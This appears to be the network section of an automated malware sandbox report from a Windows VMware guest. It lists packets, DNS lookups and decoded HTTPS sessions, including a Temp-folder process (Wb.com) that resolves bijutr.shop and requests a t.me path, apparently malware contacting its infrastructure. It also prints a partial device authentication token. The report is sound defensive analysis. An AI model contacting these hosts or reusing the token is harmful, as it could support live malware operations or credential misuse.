                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:02.264642000 CET64620443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:02.297246933 CET44364620172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:02.297269106 CET44364620172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:02.297271013 CET64620443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:02.297278881 CET44364620172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:02.297314882 CET44364620172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:02.297641039 CET64620443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:02.297744036 CET64620443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:02.297866106 CET64620443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:02.298969984 CET44364620172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:02.299135923 CET44364620172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:02.299684048 CET64620443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:02.563328028 CET64620443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:02.579036951 CET44364620172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:02.609823942 CET64620443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:02.613871098 CET44364620172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:02.613893986 CET44364620172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:02.614382029 CET64620443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:02.861001015 CET5238453192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:02.861213923 CET5067153192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:02.861330986 CET64620443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:02.861403942 CET64620443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:02.877926111 CET44364620172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:02.879609108 CET44364620172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:02.907588959 CET64620443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:03.177962065 CET44364620172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:03.217083931 CET64620443192.168.2.6172.64.41.3

                                                                                                                                                                                                                                                                                                      ICMP Packets

                                                                                                                                                                                                                                                                                                      TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:04.657156944 CET192.168.2.61.1.1.1c29d(Port unreachable)Destination Unreachable

                                                                                                                                                                                                                                                                                                      DNS Queries

                                                                                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:03.887559891 CET192.168.2.61.1.1.10x9a0bStandard query (0)jwpLqUxchOHCiOIbIyqhmtbx.jwpLqUxchOHCiOIbIyqhmtbxA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:24.473747969 CET192.168.2.61.1.1.10xae49Standard query (0)t.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:26.779230118 CET192.168.2.61.1.1.10xb07dStandard query (0)bijutr.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:42.618653059 CET192.168.2.61.1.1.10xd3d9Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:42.618839025 CET192.168.2.61.1.1.10xd81Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:58.268357038 CET192.168.2.61.1.1.10x5c60Standard query (0)ntp.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:58.268621922 CET192.168.2.61.1.1.10xc85eStandard query (0)ntp.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:01.103291035 CET192.168.2.61.1.1.10x65b6Standard query (0)bzib.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:01.103703976 CET192.168.2.61.1.1.10xee52Standard query (0)bzib.nelreports.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:01.650930882 CET192.168.2.61.1.1.10xc537Standard query (0)clients2.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:01.651113033 CET192.168.2.61.1.1.10x83f6Standard query (0)clients2.googleusercontent.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:02.519176006 CET192.168.2.61.1.1.10xecb0Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:02.519335032 CET192.168.2.61.1.1.10x85d8Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:02.519687891 CET192.168.2.61.1.1.10xbb24Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:02.519819975 CET192.168.2.61.1.1.10x11cfStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:02.530854940 CET192.168.2.61.1.1.10xb778Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:02.531002998 CET192.168.2.61.1.1.10x69bbStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:03.812201977 CET192.168.2.61.1.1.10xff91Standard query (0)sb.scorecardresearch.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:03.812444925 CET192.168.2.61.1.1.10x30b8Standard query (0)sb.scorecardresearch.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:03.826613903 CET192.168.2.61.1.1.10x1af1Standard query (0)assets.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:03.826754093 CET192.168.2.61.1.1.10xc8e1Standard query (0)assets.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:03.959671974 CET192.168.2.61.1.1.10xbaf8Standard query (0)c.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:03.959801912 CET192.168.2.61.1.1.10xa585Standard query (0)c.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:04.097448111 CET192.168.2.61.1.1.10xe219Standard query (0)api.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:04.097655058 CET192.168.2.61.1.1.10x1560Standard query (0)api.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:02.861001015 CET192.168.2.61.1.1.10x3936Standard query (0)deff.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:02.861213923 CET192.168.2.61.1.1.10x302dStandard query (0)deff.nelreports.net65IN (0x0001)false

                                                                                                                                                                                                                                                                                                      DNS Answers

                                                                                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:04.115679979 CET1.1.1.1192.168.2.60x9a0bName error (3)jwpLqUxchOHCiOIbIyqhmtbx.jwpLqUxchOHCiOIbIyqhmtbxnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:24.611607075 CET1.1.1.1192.168.2.60xae49No error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:27.168431997 CET1.1.1.1192.168.2.60xb07dNo error (0)bijutr.shop188.245.216.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:42.755601883 CET1.1.1.1192.168.2.60xd81No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:42.755759954 CET1.1.1.1192.168.2.60xd3d9No error (0)www.google.com172.217.21.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:58.405580044 CET1.1.1.1192.168.2.60xc85eNo error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:58.406171083 CET1.1.1.1192.168.2.60x5c60No error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:59.035701036 CET1.1.1.1192.168.2.60x4cdeNo error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:59.035701036 CET1.1.1.1192.168.2.60x4cdeNo error (0)ssl.bingadsedgeextension-prod-europe.azurewebsites.net94.245.104.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:59.050898075 CET1.1.1.1192.168.2.60x7821No error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:01.266204119 CET1.1.1.1192.168.2.60xee52No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:01.351643085 CET1.1.1.1192.168.2.60x65b6No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:01.798985004 CET1.1.1.1192.168.2.60x83f6No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:01.810724020 CET1.1.1.1192.168.2.60xc537No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:01.810724020 CET1.1.1.1192.168.2.60xc537No error (0)googlehosted.l.googleusercontent.com172.217.19.225A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:02.656375885 CET1.1.1.1192.168.2.60x85d8No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:02.656404018 CET1.1.1.1192.168.2.60xecb0No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:02.656404018 CET1.1.1.1192.168.2.60xecb0No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:02.656529903 CET1.1.1.1192.168.2.60x11cfNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:02.658123970 CET1.1.1.1192.168.2.60xbb24No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:02.658123970 CET1.1.1.1192.168.2.60xbb24No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:02.671454906 CET1.1.1.1192.168.2.60xb778No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:02.671454906 CET1.1.1.1192.168.2.60xb778No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:02.671958923 CET1.1.1.1192.168.2.60x69bbNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:03.951982975 CET1.1.1.1192.168.2.60xff91No error (0)sb.scorecardresearch.com3.160.188.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:03.951982975 CET1.1.1.1192.168.2.60xff91No error (0)sb.scorecardresearch.com3.160.188.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:03.951982975 CET1.1.1.1192.168.2.60xff91No error (0)sb.scorecardresearch.com3.160.188.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:03.951982975 CET1.1.1.1192.168.2.60xff91No error (0)sb.scorecardresearch.com3.160.188.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:03.965394974 CET1.1.1.1192.168.2.60xc8e1No error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:03.970015049 CET1.1.1.1192.168.2.60x1af1No error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:04.097975016 CET1.1.1.1192.168.2.60xa585No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:04.103436947 CET1.1.1.1192.168.2.60xbaf8No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:04.234858990 CET1.1.1.1192.168.2.60x1560No error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:04.235539913 CET1.1.1.1192.168.2.60xe219No error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:03.002062082 CET1.1.1.1192.168.2.60x302dNo error (0)deff.nelreports.netdeff.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:03.004352093 CET1.1.1.1192.168.2.60x3936No error (0)deff.nelreports.netdeff.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false

                                                                                                                                                                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                                                                                                                                                                      • t.me
                                                                                                                                                                                                                                                                                                      • bijutr.shop
                                                                                                                                                                                                                                                                                                      • www.google.com
                                                                                                                                                                                                                                                                                                      • chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                      • clients2.googleusercontent.com
                                                                                                                                                                                                                                                                                                      • https:
                                                                                                                                                                                                                                                                                                        • sb.scorecardresearch.com
                                                                                                                                                                                                                                                                                                        • browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                        • c.msn.com

                                                                                                                                                                                                                                                                                                      HTTPS Proxied Packets

                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                      0192.168.2.64970920.198.119.84443
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:04 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 74 47 30 49 69 61 4a 38 6c 30 57 35 72 4b 75 31 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 64 35 63 32 64 64 37 66 65 35 65 63 33 31 66 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: CNT 1 CON 305MS-CV: tG0IiaJ8l0W5rKu1.1Context: 7d5c2dd7fe5ec31f
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:04 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                                                      Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:04 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 74 47 30 49 69 61 4a 38 6c 30 57 35 72 4b 75 31 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 64 35 63 32 64 64 37 66 65 35 65 63 33 31 66 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 53 43 63 71 47 62 59 74 57 34 6f 4b 62 78 7a 47 53 71 76 4c 44 76 42 50 4f 2f 73 6f 6d 33 4f 64 4f 43 45 41 6d 39 2f 67 5a 4c 30 47 64 34 78 53 51 52 33 42 4b 31 6b 4a 68 32 39 37 77 4b 34 2b 4a 52 2f 56 6e 58 64 70 6f 54 62 7a 64 35 77 74 55 67 44 45 34 50 65 4a 74 42 34 6c 4c 43 33 58 4a 57 70 6b 63 4b 42 61 35 59 65 6a 6b
                                                                                                                                                                                                                                                                                                      Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: tG0IiaJ8l0W5rKu1.2Context: 7d5c2dd7fe5ec31f<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAASCcqGbYtW4oKbxzGSqvLDvBPO/som3OdOCEAm9/gZL0Gd4xSQR3BK1kJh297wK4+JR/VnXdpoTbzd5wtUgDE4PeJtB4lLC3XJWpkcKBa5Yejk
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:04 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 74 47 30 49 69 61 4a 38 6c 30 57 35 72 4b 75 31 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 64 35 63 32 64 64 37 66 65 35 65 63 33 31 66 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                                                                                                                      Data Ascii: BND 3 CON\WNS 0 197MS-CV: tG0IiaJ8l0W5rKu1.3Context: 7d5c2dd7fe5ec31f<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:05 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:05 UTC58INData Raw: 4d 53 2d 43 56 3a 20 35 4c 50 63 78 4c 55 69 54 55 36 46 58 73 2b 75 6e 7a 68 78 38 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                                                      Data Ascii: MS-CV: 5LPcxLUiTU6FXs+unzhx8g.0Payload parsing failed.


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                      1192.168.2.64972620.198.119.84443
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:16 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 78 39 62 65 58 35 66 5a 4e 55 57 4a 46 77 4b 4e 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 30 64 36 33 61 36 30 32 66 65 61 32 34 38 36 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: CNT 1 CON 305MS-CV: x9beX5fZNUWJFwKN.1Context: 70d63a602fea2486
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:16 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                                                      Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:16 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 78 39 62 65 58 35 66 5a 4e 55 57 4a 46 77 4b 4e 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 30 64 36 33 61 36 30 32 66 65 61 32 34 38 36 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 53 43 63 71 47 62 59 74 57 34 6f 4b 62 78 7a 47 53 71 76 4c 44 76 42 50 4f 2f 73 6f 6d 33 4f 64 4f 43 45 41 6d 39 2f 67 5a 4c 30 47 64 34 78 53 51 52 33 42 4b 31 6b 4a 68 32 39 37 77 4b 34 2b 4a 52 2f 56 6e 58 64 70 6f 54 62 7a 64 35 77 74 55 67 44 45 34 50 65 4a 74 42 34 6c 4c 43 33 58 4a 57 70 6b 63 4b 42 61 35 59 65 6a 6b
                                                                                                                                                                                                                                                                                                      Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: x9beX5fZNUWJFwKN.2Context: 70d63a602fea2486<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAASCcqGbYtW4oKbxzGSqvLDvBPO/som3OdOCEAm9/gZL0Gd4xSQR3BK1kJh297wK4+JR/VnXdpoTbzd5wtUgDE4PeJtB4lLC3XJWpkcKBa5Yejk
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:16 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 78 39 62 65 58 35 66 5a 4e 55 57 4a 46 77 4b 4e 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 30 64 36 33 61 36 30 32 66 65 61 32 34 38 36 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                                                                                                                      Data Ascii: BND 3 CON\WNS 0 197MS-CV: x9beX5fZNUWJFwKN.3Context: 70d63a602fea2486<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:17 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:17 UTC58INData Raw: 4d 53 2d 43 56 3a 20 32 32 59 51 70 59 56 72 37 30 79 30 51 71 4f 66 4f 6b 35 6c 65 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                                                      Data Ascii: MS-CV: 22YQpYVr70y0QqOfOk5leg.0Payload parsing failed.


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                      2192.168.2.649752149.154.167.994432744C:\Users\user\AppData\Local\Temp\623615\Wb.com
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:26 UTC85OUTGET /k04ael HTTP/1.1
                                                                                                                                                                                                                                                                                                      Host: t.me
